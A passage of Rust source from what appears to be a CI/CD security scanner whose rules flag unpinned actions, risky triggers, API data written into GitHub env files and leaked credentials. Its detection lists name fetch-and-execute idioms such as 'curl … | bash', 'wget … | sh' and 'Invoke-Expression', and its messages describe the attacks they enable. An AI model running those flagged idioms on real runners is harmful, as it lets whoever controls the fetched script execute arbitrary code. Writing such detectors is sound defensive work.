        "${TF_OUT_",
    ];
    CAPTURE_MARKERS.iter().any(|m| body.contains(m))
}
/// Extract the variable names set by every
/// `##vso[task.setvariable variable=NAME ...]` directive in the body.
/// Tolerates whitespace and either `;` or `]` as the variable= terminator.
/// Names are restricted to `[A-Za-z0-9_.]`; the result is sorted and
/// deduplicated.
fn setvariable_names_in(body: &str) -> Vec<String> {
    const NEEDLE: &str = "##vso[task.setvariable variable=";
    let mut names: Vec<String> = Vec::new();
    let mut rest = body;
    while let Some(idx) = rest.find(NEEDLE) {
        // Everything after `variable=` up to the first `;`, `]`, or
        // whitespace is the candidate name.
        let tail = &rest[idx + NEEDLE.len()..];
        let end = tail
            .find(|c: char| c == ';' || c == ']' || c.is_whitespace())
            .unwrap_or(tail.len());
        let candidate = tail[..end].trim();
        let well_formed = !candidate.is_empty()
            && candidate
                .chars()
                .all(|c| c.is_ascii_alphanumeric() || c == '_' || c == '.');
        if well_formed {
            names.push(candidate.to_string());
        }
        // Resume scanning after the consumed name.
        rest = &tail[end..];
    }
    names.sort();
    names.dedup();
    names
}
/// Phase-2 predicate: does `body` reference `$(name)` in a shell-expansion
/// position? "Shell-expansion position" means the value will be parsed by
/// a shell or PowerShell interpreter at runtime, rather than being fed
/// into a function/cmdlet that quotes its arguments.
///
/// Three checks, cheapest first:
/// 1. whole-body interpreter sigils (`bash -c`, `eval`, `iex`, `-split`, …)
/// 2. nested command substitution on the same line as `$(name)`
/// 3. bare line-leading `$(name)` (command-word position)
fn expansion_in_shell_position(body: &str, name: &str) -> bool {
    let needle = format!("$({name})");
    if !body.contains(&needle) {
        return false;
    }
    // Cheap whole-body checks: if the script contains any of these
    // primitives anywhere, an interpolation of `$(name)` elsewhere in the
    // same script is at risk. The `sharedservice-solarwinds` corpus
    // exemplar exercises the `-split` + `Invoke-Command` + foreach branch
    // — all three signals fire.
    let sigil_set: &[&str] = &[
        "bash -c",
        "sh -c",
        "eval ",
        "Invoke-Expression",
        " iex ",
        "iex(",
        "iex (",
        "Invoke-Command",
        "-split",
    ];
    if sigil_set.iter().any(|s| body.contains(s)) {
        return true;
    }
    // Nested command substitution: `$(... $(name) ...)`. ADO's `$(macro)`
    // and POSIX `$(cmd)` share the same surface syntax, so any unclosed
    // `$(` in the prefix before `$(name)` on the same line indicates the
    // sink is being parsed inside another command substitution. Naive
    // open/close counting — adequate for inline-script bodies; we don't
    // attempt to balance properly.
    for line in body.lines() {
        if let Some(pos) = line.find(&needle) {
            let prefix = &line[..pos];
            let opens = prefix.matches("$(").count();
            let closes = prefix.matches(')').count();
            if opens > closes {
                return true;
            }
        }
    }
    // Bare unquoted line-leading reference: `$(NAME) ...` — the value is
    // parsed as a command line. Assignment forms that quote the value
    // (PowerShell `$x = "$(name)"`, POSIX `X="$(name)"`) can never reach
    // here: their lines start with the assigned variable, not with
    // `$(name)` itself.
    body.lines()
        .any(|line| line.trim_start().starts_with(&needle))
}
// NOTE(review): the stray `/// Run all rules against a graph.` doc comment
// that used to sit here attached (per rustdoc rules) to the unrelated
// function below; it appears to belong to a moved/removed `run_all` entry
// point, so it has been demoted to this regular comment.
//
// ── runtime_script_fetched_from_floating_url ──────────────────
//
// Detect `run:` blocks that download a remote script from a non-pinned URL
// and pipe it directly to a shell interpreter. This is a pure HTTP supply-chain
// vector — neither `unpinned_action` (which inspects `uses:`) nor
// `floating_image` (containers) covers it.
//
// Detection primitive (URL must be both):
//   1. shell-style fetch+execute: `curl … | bash`, `wget … | sh`,
//      `bash <(curl …)`, or `deno run https://…`
//   2. URL is mutable: contains `refs/heads/`, `/main/`, `/master/`,
//      `/develop/`, `/HEAD/`, OR is a raw `git clone`/`fetch` from a
//      branch URL with no version pin.
//
// Severity: High (one upstream commit lands code on every consumer).
/// Returns true when `body` contains a fetch-and-execute line whose URL
/// is pinned to a mutable ref (per `line_url_is_mutable`).
///
/// Matching is case-sensitive on purpose: `curl`/`wget`/`bash`/`sh`/`deno`
/// are lowercase tool names. (The previous `let lower = body;` binding was
/// misleadingly named — it never lowercased anything — and the sink list
/// was duplicated between the pre-filter and the per-line scan; both are
/// fixed by sharing one predicate.)
fn body_has_pipe_to_shell_with_floating_url(body: &str) -> bool {
    // Shared sink predicate: fetch piped into a shell, process
    // substitution of a fetch, or `deno run` against a remote URL.
    fn has_fetch_exec(text: &str) -> bool {
        const PIPE_SINKS: &[&str] = &["| bash", "|bash", "| sh", "|sh", "<(curl", "<(wget"];
        PIPE_SINKS.iter().any(|s| text.contains(s))
            || text.contains("deno run http://")
            || text.contains("deno run https://")
    }
    // Cheap whole-body pre-filter to keep the per-line scan fast: a
    // curl/wget mention plus some fetch+exec sink, or a remote deno run.
    let has_fetch_tool = body.contains("curl") || body.contains("wget");
    let has_deno_remote =
        body.contains("deno run http://") || body.contains("deno run https://");
    if !((has_fetch_tool && has_fetch_exec(body)) || has_deno_remote) {
        return false;
    }
    // For each line that contains a fetch+pipe or a deno-remote run, check
    // whether the URL on that line is mutable.
    body.lines()
        .any(|line| has_fetch_exec(line) && line_url_is_mutable(line))
}
/// True when `line` contains a URL path segment that names a moving ref
/// rather than a pinned version.
///
/// Bare `raw.githubusercontent.com/<owner>/<repo>/<ref>/...` with a
/// literal `main`/`master` segment is caught by the marker list. We could
/// be looser and flag any URL with no version-like segment, but that
/// sacrifices precision — this list is the conservative core.
fn line_url_is_mutable(line: &str) -> bool {
    const MUTABLE_MARKERS: [&str; 7] = [
        "refs/heads/",
        "/HEAD/",
        "/main/",
        "/master/",
        "/develop/",
        "/trunk/",
        "/latest/",
    ];
    MUTABLE_MARKERS.iter().any(|m| line.contains(m))
}
/// Rule: a `run:` step pipes a remotely-fetched script into a shell, where
/// the URL is pinned to a mutable branch ref. The remote host's branch tip
/// becomes a write-anywhere primitive on the runner.
///
/// Severity: High.
pub fn runtime_script_fetched_from_floating_url(graph: &AuthorityGraph) -> Vec<Finding> {
    let mut out = Vec::new();
    for step in graph.nodes_of_kind(NodeKind::Step) {
        // Non-empty script body that downloads-and-executes from a
        // mutable URL.
        let flagged = step
            .metadata
            .get(META_SCRIPT_BODY)
            .map(|b| !b.is_empty() && body_has_pipe_to_shell_with_floating_url(b))
            .unwrap_or(false);
        if !flagged {
            continue;
        }
        out.push(Finding {
            severity: Severity::High,
            category: FindingCategory::RuntimeScriptFetchedFromFloatingUrl,
            path: None,
            nodes_involved: vec![step.id],
            message: format!(
                "Step '{}' downloads and executes a script from a mutable URL (curl|bash, wget|sh, or `deno run` against a branch ref) — whoever controls that branch executes arbitrary code on the runner",
                step.name
            ),
            recommendation: Recommendation::Manual {
                action: "Pin the URL to a release tag or commit SHA (e.g. .../v1.2.3/install.sh) and verify the download against a known checksum before executing it. Avoid `curl … | bash` entirely where possible — fetch to a file, inspect, then run.".into(),
            },
            source: FindingSource::BuiltIn,
            extras: FindingExtras::default(),
        });
    }
    out
}
// ── pr_trigger_with_floating_action_ref ────────────────────────
//
// Detect the high-severity conjunction: workflow runs in privileged base-repo
// context (`pull_request_target` / `issue_comment` / `workflow_run`) AND uses
// at least one action by mutable ref (not SHA). Either condition alone is a
// finding from another rule; the conjunction is critical because the trigger
// grants write-token authority *and* the floating action lets an attacker
// substitute the executed code.
fn trigger_is_privileged_pr_class(trigger: &str) -> bool {
    // META_TRIGGER may hold a single trigger or a comma-separated list; any
    // privileged entry makes the whole workflow privileged.
    for entry in trigger.split(',') {
        match entry.trim() {
            "pull_request_target" | "issue_comment" | "workflow_run" => return true,
            _ => {}
        }
    }
    false
}
/// Rule: privileged PR-class trigger combined with a non-SHA-pinned action ref.
///
/// Severity: Critical (full repo write token + attacker-controlled action code).
pub fn pr_trigger_with_floating_action_ref(graph: &AuthorityGraph) -> Vec<Finding> {
    let Some(trigger) = graph.metadata.get(META_TRIGGER).map(String::as_str) else {
        return Vec::new();
    };
    if !trigger_is_privileged_pr_class(trigger) {
        return Vec::new();
    }
    let mut seen = std::collections::HashSet::new();
    let mut findings = Vec::new();
    for action in graph.nodes_of_kind(NodeKind::Image) {
        // One fused guard covers every skip case:
        //  - first-party refs (local actions, self-hosted runner labels);
        //  - container images (covered by the floating_image rule);
        //  - self-hosted-runner Image nodes (FirstParty today, but stay
        //    defensive against future refactors);
        //  - refs already pinned to a SHA;
        //  - action refs already reported (dedupe by name).
        // `seen.insert` stays last so only reported refs are recorded.
        if action.trust_zone == TrustZone::FirstParty
            || action
                .metadata
                .get(META_CONTAINER)
                .map_or(false, |v| v == "true")
            || action.metadata.contains_key(META_SELF_HOSTED)
            || is_sha_pinned(&action.name)
            || !seen.insert(&action.name)
        {
            continue;
        }
        findings.push(Finding {
            severity: Severity::Critical,
            category: FindingCategory::PrTriggerWithFloatingActionRef,
            path: None,
            nodes_involved: vec![action.id],
            message: format!(
                "Workflow trigger '{trigger}' runs in privileged base-repo context and step uses unpinned action '{}' — anyone who can push to that action's branch executes arbitrary code with full repo write token",
                action.name
            ),
            recommendation: Recommendation::PinAction {
                current: action.name.clone(),
                pinned: format!(
                    "{}@<sha256-digest>",
                    action.name.split('@').next().unwrap_or(&action.name)
                ),
            },
            source: FindingSource::BuiltIn,
            extras: FindingExtras::default(),
        });
    }
    findings
}
// ── untrusted_api_response_to_env_sink ────────────────────────
//
// Detect `workflow_run` consumer workflows that capture an external API
// response (gh CLI, curl against api.github.com) and write it into the GHA
// environment file. A poisoned API field (branch name, PR title, commit
// message) injects environment variables into every subsequent step in the
// same job.
/// Heuristic: does `body` capture a GitHub API response and redirect it into
/// one of the GHA gate files (`$GITHUB_ENV` / `$GITHUB_OUTPUT` / `$GITHUB_PATH`)?
///
/// Previously the API-source and env-sink marker lists were written out three
/// times (whole-body gate, tier-1 same-line pass, tier-2 proximity pass) —
/// any future marker added to one copy but not the others would silently
/// weaken the rule. They now live in single nested predicates. The two tiers
/// are merged: a same-line conjunction is exactly a proximity match at
/// distance 0, so one pass covers both. The intermediate `Vec<&str>` of
/// lines is gone as well — `str::lines()` is iterated lazily.
fn body_writes_api_response_to_env_sink(body: &str) -> bool {
    // Source predicate: gh CLI subcommands or a direct REST call against
    // api.github.com.
    fn calls_api(s: &str) -> bool {
        s.contains("gh pr view")
            || s.contains("gh pr list")
            || s.contains("gh api ")
            || s.contains("gh issue view")
            || s.contains("api.github.com")
    }
    // Sink predicate: a reference to one of the GHA gate files, in both the
    // `$VAR` and `${VAR}` spellings.
    fn writes_env_sink(s: &str) -> bool {
        s.contains("$GITHUB_ENV")
            || s.contains("${GITHUB_ENV}")
            || s.contains("$GITHUB_OUTPUT")
            || s.contains("${GITHUB_OUTPUT}")
            || s.contains("$GITHUB_PATH")
            || s.contains("${GITHUB_PATH}")
    }
    // Cheap whole-body gate: both a source and a sink must appear somewhere.
    if !writes_env_sink(body) || !calls_api(body) {
        return false;
    }
    // Proximity pass. Without dataflow we approximate "the API response
    // reaches the sink" as: a sink line at most 6 lines after the latest API
    // line. Distance 0 is the canonical same-line idiom from the corpus
    // (`gh pr view --jq '"PR_NUMBER=\(.number)"' >> $GITHUB_ENV`); distances
    // 1..=6 catch multi-step capture-then-write idioms while keeping
    // false-positive risk acceptable.
    let mut last_api_line: Option<usize> = None;
    for (i, line) in body.lines().enumerate() {
        if calls_api(line) {
            last_api_line = Some(i);
        }
        if writes_env_sink(line) {
            if let Some(api_idx) = last_api_line {
                if i.saturating_sub(api_idx) <= 6 {
                    return true;
                }
            }
        }
    }
    false
}
/// Rule: workflow_run-triggered workflow writes an API response value to the
/// GHA environment gate. Branch name / PR title in the response can carry
/// newline-injected env-var assignments.
///
/// Severity: High.
pub fn untrusted_api_response_to_env_sink(graph: &AuthorityGraph) -> Vec<Finding> {
    // Only triggers whose runs hold base-repo authority while handling
    // attacker-influenced data are in scope.
    let Some(trigger) = graph.metadata.get(META_TRIGGER).map(String::as_str) else {
        return Vec::new();
    };
    let in_scope = trigger
        .split(',')
        .map(str::trim)
        .any(|t| matches!(t, "workflow_run" | "pull_request_target" | "issue_comment"));
    if !in_scope {
        return Vec::new();
    }
    graph
        .nodes_of_kind(NodeKind::Step)
        .filter_map(|step| {
            let body = step.metadata.get(META_SCRIPT_BODY)?;
            if body.is_empty() || !body_writes_api_response_to_env_sink(body) {
                return None;
            }
            Some(Finding {
                severity: Severity::High,
                category: FindingCategory::UntrustedApiResponseToEnvSink,
                path: None,
                nodes_involved: vec![step.id],
                message: format!(
                    "Step '{}' captures a GitHub API response (gh CLI or api.github.com) into the GHA env gate ($GITHUB_ENV/$GITHUB_OUTPUT/$GITHUB_PATH) under trigger '{trigger}' — attacker-influenced fields (branch name, PR title) can inject environment variables for every subsequent step in the same job",
                    step.name
                ),
                recommendation: Recommendation::Manual {
                    action: "Validate the API field with a strict regex before redirecting (e.g. only `[0-9]+` for a PR number), or write only known-numeric fields. Never pipe free-form fields like branch name or PR title directly into $GITHUB_ENV.".into(),
                },
                source: FindingSource::BuiltIn,
                extras: FindingExtras::default(),
            })
        })
        .collect()
}
// ── pr_build_pushes_image_with_floating_credentials ────────────
//
// Detect: workflow triggered by a PR-class event uses a container-registry
// login action that is NOT SHA-pinned. The login action receives credentials
// (OIDC token or static registry secret) — a compromise of the action's
// branch lets an attacker exfiltrate them.
fn is_registry_login_action(action: &str) -> bool {
    // Compare against the ref-less action slug (`owner/name`).
    let slug = action.split('@').next().unwrap_or(action);
    // Well-known vendor login/auth actions.
    const KNOWN_LOGIN_ACTIONS: &[&str] = &[
        "docker/login-action",
        "aws-actions/amazon-ecr-login",
        "aws-actions/configure-aws-credentials",
        "azure/docker-login",
        "azure/login",
        "google-github-actions/auth",
        "google-github-actions/setup-gcloud",
    ];
    // Org-local composite wrappers, matched by conventional name suffix.
    const LOGIN_SUFFIXES: &[&str] = &[
        "/login-to-gar",
        "/dockerhub-login",
        "/login-to-ecr",
        "/login-to-acr",
    ];
    KNOWN_LOGIN_ACTIONS.contains(&slug) || LOGIN_SUFFIXES.iter().any(|s| slug.ends_with(s))
}
fn trigger_includes_pull_request(trigger: &str) -> bool {
    // Both plain `pull_request` and privileged `pull_request_target` count
    // as PR-class here.
    trigger
        .split(',')
        .map(str::trim)
        .any(|t| matches!(t, "pull_request" | "pull_request_target"))
}
/// Rule: PR-triggered workflow uses a non-SHA-pinned container-registry login
/// action. Compound vector: floating action holds registry creds + PR-controlled
/// image content reaches a shared registry.
///
/// Severity: High.
pub fn pr_build_pushes_image_with_floating_credentials(graph: &AuthorityGraph) -> Vec<Finding> {
    let Some(trigger) = graph.metadata.get(META_TRIGGER).map(String::as_str) else {
        return Vec::new();
    };
    if !trigger_includes_pull_request(trigger) {
        return Vec::new();
    }
    let mut seen = std::collections::HashSet::new();
    let mut findings = Vec::new();
    for action in graph.nodes_of_kind(NodeKind::Image) {
        // Fused skip guard: first-party refs, container images, non-login
        // actions, SHA-pinned refs, and names already reported (the dedupe
        // insert stays last so `seen` only records reported refs).
        if action.trust_zone == TrustZone::FirstParty
            || action
                .metadata
                .get(META_CONTAINER)
                .map_or(false, |v| v == "true")
            || !is_registry_login_action(&action.name)
            || is_sha_pinned(&action.name)
            || !seen.insert(&action.name)
        {
            continue;
        }
        findings.push(Finding {
            severity: Severity::High,
            category: FindingCategory::PrBuildPushesImageWithFloatingCredentials,
            path: None,
            nodes_involved: vec![action.id],
            message: format!(
                "PR-triggered workflow ('{trigger}') uses unpinned registry-login action '{}' — a compromise of that action's branch exfiltrates registry credentials or OIDC tokens, and any PR-controlled image content then reaches a shared registry",
                action.name
            ),
            recommendation: Recommendation::PinAction {
                current: action.name.clone(),
                pinned: format!(
                    "{}@<sha256-digest>",
                    action.name.split('@').next().unwrap_or(&action.name)
                ),
            },
            source: FindingSource::BuiltIn,
            extras: FindingExtras::default(),
        });
    }
    findings
}
/// Runs every built-in rule against `graph` and returns the combined,
/// severity-sorted findings list.
///
/// Ordering notes:
/// - All rules run before the two post-passes (`apply_compensating_controls`,
///   then `apply_confidence_cap`), so suppressions and the partial-graph
///   severity cap see the complete finding set.
/// - `sort_by_key` is a stable sort, so findings of equal severity keep the
///   registration order below. Don't reorder these calls casually — output
///   ordering is observable (e.g. in snapshots/SARIF).
pub fn run_all_rules(graph: &AuthorityGraph, max_hops: usize) -> Vec<Finding> {
    let mut findings = Vec::new();
    // MVP rules
    // `authority_propagation` is the only rule taking the hop budget.
    findings.extend(authority_propagation(graph, max_hops));
    findings.extend(over_privileged_identity(graph));
    findings.extend(unpinned_action(graph));
    findings.extend(untrusted_with_authority(graph));
    findings.extend(artifact_boundary_crossing(graph));
    // Stretch rules
    findings.extend(long_lived_credential(graph));
    findings.extend(floating_image(graph));
    findings.extend(persisted_credential(graph));
    findings.extend(trigger_context_mismatch(graph));
    findings.extend(cross_workflow_authority_chain(graph));
    findings.extend(authority_cycle(graph));
    findings.extend(uplift_without_attestation(graph));
    findings.extend(self_mutating_pipeline(graph));
    findings.extend(checkout_self_pr_exposure(graph));
    findings.extend(variable_group_in_pr_job(graph));
    findings.extend(self_hosted_pool_pr_hijack(graph));
    findings.extend(service_connection_scope_mismatch(graph));
    findings.extend(template_extends_unpinned_branch(graph));
    findings.extend(template_repo_ref_is_feature_branch(graph));
    findings.extend(vm_remote_exec_via_pipeline_secret(graph));
    findings.extend(short_lived_sas_in_command_line(graph));
    // ADO inline-script secret-leak rules
    findings.extend(secret_to_inline_script_env_export(graph));
    findings.extend(secret_materialised_to_workspace_file(graph));
    findings.extend(keyvault_secret_to_plaintext(graph));
    findings.extend(terraform_auto_approve_in_prod(graph));
    findings.extend(addspn_with_inline_script(graph));
    findings.extend(parameter_interpolation_into_shell(graph));
    // GHA red-team-derived rules
    findings.extend(runtime_script_fetched_from_floating_url(graph));
    findings.extend(pr_trigger_with_floating_action_ref(graph));
    findings.extend(untrusted_api_response_to_env_sink(graph));
    findings.extend(pr_build_pushes_image_with_floating_credentials(graph));
    findings.extend(secret_via_env_gate_to_untrusted_consumer(graph));
    // Blue-team positive invariants (negative-space rules — fire on absence
    // of expected defenses)
    findings.extend(no_workflow_level_permissions_block(graph));
    findings.extend(prod_deploy_job_no_environment_gate(graph));
    findings.extend(long_lived_secret_without_oidc_recommendation(graph));
    findings.extend(pull_request_workflow_inconsistent_fork_check(graph));
    findings.extend(gitlab_deploy_job_missing_protected_branch_only(graph));
    findings.extend(terraform_output_via_setvariable_shell_expansion(graph));
    // GHA council Bucket 1 rules
    findings.extend(risky_trigger_with_authority(graph));
    findings.extend(sensitive_value_in_job_output(graph));
    findings.extend(manual_dispatch_input_to_url_or_command(graph));
    // GHA council Bucket 2 rules
    findings.extend(secrets_inherit_overscoped_passthrough(graph));
    findings.extend(unsafe_pr_artifact_in_workflow_run_consumer(graph));
    // GHA council Bucket 3 rules
    findings.extend(script_injection_via_untrusted_context(graph));
    findings.extend(interactive_debug_action_in_authority_workflow(graph));
    findings.extend(pr_specific_cache_key_in_default_branch_consumer(graph));
    findings.extend(gh_cli_with_default_token_escalating(graph));
    // GitLab council Bucket A rules
    findings.extend(ci_job_token_to_external_api(graph));
    findings.extend(id_token_audience_overscoped(graph));
    findings.extend(untrusted_ci_var_in_shell_interpolation(graph));
    // GitLab council Bucket B+C rules
    findings.extend(unpinned_include_remote_or_branch_ref(graph));
    findings.extend(dind_service_grants_host_authority(graph));
    findings.extend(security_job_silently_skipped(graph));
    findings.extend(child_pipeline_trigger_inherits_authority(graph));
    findings.extend(cache_key_crosses_trust_boundary(graph));
    // GitLab red-team Group D rules
    findings.extend(pat_embedded_in_git_remote_url(graph));
    findings.extend(ci_token_triggers_downstream_with_variable_passthrough(
        graph,
    ));
    findings.extend(dotenv_artifact_flows_to_privileged_deployment(graph));
    // Blue-team compensating-control suppressions (downgrade or suppress
    // existing-rule findings when a control elsewhere in the graph
    // neutralises the risk).
    apply_compensating_controls(graph, &mut findings);
    apply_confidence_cap(graph, &mut findings);
    findings.sort_by_key(|f| f.severity);
    findings
}
// ── R3: risky_trigger_with_authority ────────────────────
// `issue_comment`, `pull_request_review`, `pull_request_review_comment`, and
// `workflow_run` are high-blast-radius triggers — anyone able to comment on
// an issue (or any contributor whose previous workflow run completed) can
// fire the workflow with secrets in scope. `trigger_context_mismatch` only
// fires on `pull_request_target` / ADO `pr`, so this rule closes the gap.
/// Trigger names that confer the same effective blast radius as
/// `pull_request_target` once they're paired with write permissions or
/// non-`GITHUB_TOKEN` secrets. Order is alphabetical for stable output.
///
/// Consumed by `risky_trigger_with_authority`. Distinct from
/// `RISKY_TRIGGER_NAMES` (defined later), which additionally includes the
/// `pull_request` family for the passthrough/artifact rules.
const RISKY_TRIGGERS: &[&str] = &[
    "issue_comment",
    "pull_request_review",
    "pull_request_review_comment",
    "workflow_run",
];
/// Returns true if the permissions string declares any GitHub Actions
/// write-grant scope (`*: write`) or `write-all`. Conservatively flags
/// any unscoped `write-all`. The `: write` substring check catches
/// `contents: write`, `pull-requests: write`, `id-token: write`, etc.,
/// regardless of how `Permissions::Map` formats the surrounding map.
fn permissions_grant_writes(perm_string: &str) -> bool {
    let lowered = perm_string.to_lowercase();
    ["write-all", ": write"]
        .iter()
        .any(|marker| lowered.contains(*marker))
}
/// Rule: high-blast-radius trigger (`issue_comment`,
/// `pull_request_review[_comment]`, `workflow_run`) declared alongside
/// write-grant permissions or any non-`GITHUB_TOKEN` secret.
///
/// Detection (deterministic, no path traversal):
/// 1. Read `META_TRIGGERS` (graph metadata) — comma-joined list of every
///    trigger declared under `on:`.
/// 2. Filter for entries in `RISKY_TRIGGERS`.
/// 3. Inspect every Identity node carrying `META_PERMISSIONS` — if any
///    grants `: write` or `write-all`, the workflow holds write authority.
/// 4. Scan all Secret nodes; any whose name is not literally `GITHUB_TOKEN`
///    counts as a non-default secret in scope.
/// 5. Fire one finding per workflow when steps 1–2 match AND (3 OR 4).
///
/// Severity: High. The blast radius matches `pull_request_target` but the
/// trigger surface is broader (anyone with comment access vs. only PR
/// authors), so this rule never downgrades by trigger type.
pub fn risky_trigger_with_authority(graph: &AuthorityGraph) -> Vec<Finding> {
    // Count-aware phrase builders: the pluralization was previously written
    // out three times inline; centralising it keeps the message wording in
    // one place ("1 write-grant identity" / "2 write-grant identities").
    fn identity_phrase(count: usize) -> String {
        format!(
            "{} write-grant identit{}",
            count,
            if count == 1 { "y" } else { "ies" },
        )
    }
    fn secret_phrase(count: usize) -> String {
        format!(
            "{} non-default secret{}",
            count,
            if count == 1 { "" } else { "s" },
        )
    }
    let triggers_meta = match graph.metadata.get(META_TRIGGERS) {
        Some(t) => t,
        None => return Vec::new(),
    };
    let risky_present: Vec<&str> = triggers_meta
        .split(',')
        .map(str::trim)
        .filter(|t| RISKY_TRIGGERS.iter().any(|r| r == t))
        .collect();
    if risky_present.is_empty() {
        return Vec::new();
    }
    // (3) Any Identity node with write permissions?
    let mut writes_identities: Vec<NodeId> = Vec::new();
    for ident in graph.nodes_of_kind(NodeKind::Identity) {
        if let Some(perms) = ident.metadata.get(META_PERMISSIONS) {
            if permissions_grant_writes(perms) {
                writes_identities.push(ident.id);
            }
        }
    }
    // (4) Any non-GITHUB_TOKEN secret in scope?
    let non_default_secrets: Vec<NodeId> = graph
        .nodes_of_kind(NodeKind::Secret)
        .filter(|s| s.name != "GITHUB_TOKEN")
        .map(|s| s.id)
        .collect();
    if writes_identities.is_empty() && non_default_secrets.is_empty() {
        return Vec::new();
    }
    let trigger_label = risky_present.join(", ");
    let cause = match (writes_identities.is_empty(), non_default_secrets.is_empty()) {
        (false, false) => format!(
            "{} and {}",
            identity_phrase(writes_identities.len()),
            secret_phrase(non_default_secrets.len()),
        ),
        (false, true) => identity_phrase(writes_identities.len()),
        (true, false) => secret_phrase(non_default_secrets.len()),
        // Guarded by the emptiness check above.
        (true, true) => unreachable!("both-empty case returns early"),
    };
    // Move (not clone) the identity ids into the finding: neither vector is
    // used after this point, so the previous `.clone()` was a dead allocation.
    let mut nodes_involved = writes_identities;
    nodes_involved.extend(non_default_secrets);
    vec![Finding {
        severity: Severity::High,
        category: FindingCategory::RiskyTriggerWithAuthority,
        path: None,
        nodes_involved,
        message: format!(
            "Workflow trigger(s) [{trigger_label}] grant the same blast radius as pull_request_target but slip past trigger_context_mismatch — {cause} are reachable from any commenter / upstream-run author"
        ),
        recommendation: Recommendation::Manual {
            action: "Drop write-grant permissions to the minimum the trigger requires (most labelers/triagers only need `pull-requests: write` or `issues: write`), or split the workflow: keep the comment-triggered handler authority-free and gate privileged work behind a separate workflow that an authorized user must dispatch manually.".into(),
        },
        source: FindingSource::BuiltIn,
        extras: FindingExtras::default(),
    }]
}
// ── R4: sensitive_value_in_job_output ───────────────────
// `jobs.<id>.outputs.<name>` is written to the run log (only the heuristic
// mask protects it) and propagates unmasked via `needs.<job>.outputs.*`.
// Sourcing an output from `secrets.*`, an OIDC-bearing step output, or
// giving it a credential-shaped name is a structural leak.
/// Suffixes that mark a job-output name as credential-shaped. Matched
/// case-insensitively against the trailing segment of the output name.
const CREDENTIAL_NAME_SUFFIXES: &[&str] = &[
    "_token",
    "_secret",
    "_key",
    "_pem",
    "_password",
    "_credential",
    "_credentials",
    "_api_key",
];
/// Returns true if `name` ends with any of `CREDENTIAL_NAME_SUFFIXES`.
/// The name is lowercased before comparison; the suffix table is already
/// lowercase, so the match is case-insensitive.
fn output_name_is_credential_shaped(name: &str) -> bool {
    let lowered = name.to_lowercase();
    for suffix in CREDENTIAL_NAME_SUFFIXES {
        if lowered.ends_with(suffix) {
            return true;
        }
    }
    false
}
/// Rule: a `jobs.<id>.outputs.<name>` value is sourced from `secrets.*`, an
/// OIDC-bearing step output, or has a credential-shaped name (suffix
/// matches `_token` / `_secret` / `_key` / `_pem` / `_password` /
/// `_credential[s]` / `_api_key`).
///
/// Detection: read `META_JOB_OUTPUTS` (graph metadata) — pipe-delimited
/// records of `<job>\t<name>\t<source>`. For each record, fire a finding
/// when `source != "literal"` OR `name` matches a credential suffix.
///
/// Severity:
///  - **Critical** when `source == "secret"` (raw `secrets.*` value).
///  - **Critical** when `source == "oidc"` (OIDC token leaked via output).
///  - **High** when `source == "step_output"` AND name is credential-shaped.
///  - **High** when `source == "literal"` AND name is credential-shaped
///    (developer is signaling credential intent in the API).
///  - Otherwise no finding.
pub fn sensitive_value_in_job_output(graph: &AuthorityGraph) -> Vec<Finding> {
    let raw = match graph.metadata.get(META_JOB_OUTPUTS) {
        Some(s) if !s.is_empty() => s,
        _ => return Vec::new(),
    };
    let mut findings = Vec::new();
    for record in raw.split('|') {
        // Record layout: "<job>\t<name>\t<source>"; skip records missing a
        // job or output name. Missing source defaults to "literal".
        let mut fields = record.splitn(3, '\t');
        let (Some(job), Some(name)) = (
            fields.next().filter(|f| !f.is_empty()),
            fields.next().filter(|f| !f.is_empty()),
        ) else {
            continue;
        };
        let source = fields.next().unwrap_or("literal");
        let shaped = output_name_is_credential_shaped(name);
        let verdict = match (source, shaped) {
            ("secret", _) => Some((
                Severity::Critical,
                "value reads `secrets.*` directly — exfiltrated to run log and to every downstream `needs.*.outputs.*` consumer",
            )),
            ("oidc", _) => Some((
                Severity::Critical,
                "value derives from a step that holds an OIDC identity — the federated token leaks through the output channel",
            )),
            ("step_output", true) => Some((
                Severity::High,
                "credential-shaped output name backed by a step output — masking is heuristic, downstream consumers see plaintext",
            )),
            ("literal", true) => Some((
                Severity::High,
                "credential-shaped output name with a literal value — either the value is a hard-coded secret or the contract leaks credentials to downstream jobs",
            )),
            _ => None,
        };
        let Some((severity, reason)) = verdict else {
            continue;
        };
        findings.push(Finding {
            severity,
            category: FindingCategory::SensitiveValueInJobOutput,
            path: None,
            nodes_involved: Vec::new(),
            message: format!(
                "Job '{job}' declares output '{name}' — {reason}"
            ),
            recommendation: Recommendation::Manual {
                action: "Do not expose secrets, OIDC tokens, or credential-shaped values via `jobs.<id>.outputs.*`. Pass them between steps within a single job using `env:` (which honors masking) or write them to a secure file consumed only by a downstream step. If a downstream job needs to act on a credential, fetch it directly from the secret store inside that job instead of inheriting it through outputs.".into(),
            },
            source: FindingSource::BuiltIn,
            extras: FindingExtras::default(),
        });
    }
    findings
}
// ── R6: manual_dispatch_input_to_url_or_command ────────
// `workflow_dispatch.inputs.*` is attacker-controlled in any repository
// where collaborators have `Actions: write`. Flowing an input value into
// `curl` / `wget` / `gh api` / a `run:` URL / `actions/checkout` `ref:`
// gives the dispatcher arbitrary code execution against the runner — a
// pivot from "can run a workflow" to "can land arbitrary code on a
// privileged runner".
/// Tokens that indicate command-line consumption of an input value when
/// they appear in the same `run:` body as the input expression. Each token
/// must be matched whole-word so we don't false-positive on `curlier` etc.
/// (the whole-word matching itself lives in `body_contains_command`).
const COMMAND_SINKS: &[&str] = &[
    "curl",
    "wget",
    "gh api",
    "gh release",
    "gh secret",
    "gh repo",
    "git clone",
    "git fetch",
];
/// Returns true if `body` contains a whole-word occurrence of `needle`.
/// "Whole word" means the match is neither preceded nor followed by an
/// ASCII alphanumeric or `_`, so `curl` does not match inside `curlier`
/// and `git fetch` does not match inside `git fetcher`. Start and end of
/// string count as word boundaries.
fn body_contains_command(body: &str, needle: &str) -> bool {
    let bytes = body.as_bytes();
    // Is the byte at `idx` part of a word? Out-of-range reads count as
    // "no", which makes end-of-string a valid boundary for free.
    let is_word_byte = |idx: usize| {
        bytes
            .get(idx)
            .map(|b| b.is_ascii_alphanumeric() || *b == b'_')
            .unwrap_or(false)
    };
    let mut search_from = 0;
    while let Some(offset) = body[search_from..].find(needle) {
        let hit = search_from + offset;
        let end = hit + needle.len();
        let boundary_before = hit == 0 || !is_word_byte(hit - 1);
        if boundary_before && !is_word_byte(end) {
            return true;
        }
        // This occurrence was embedded in a longer word; resume just past it.
        search_from = end;
    }
    false
}
/// Returns true if `body` references the dispatch input `name` via either
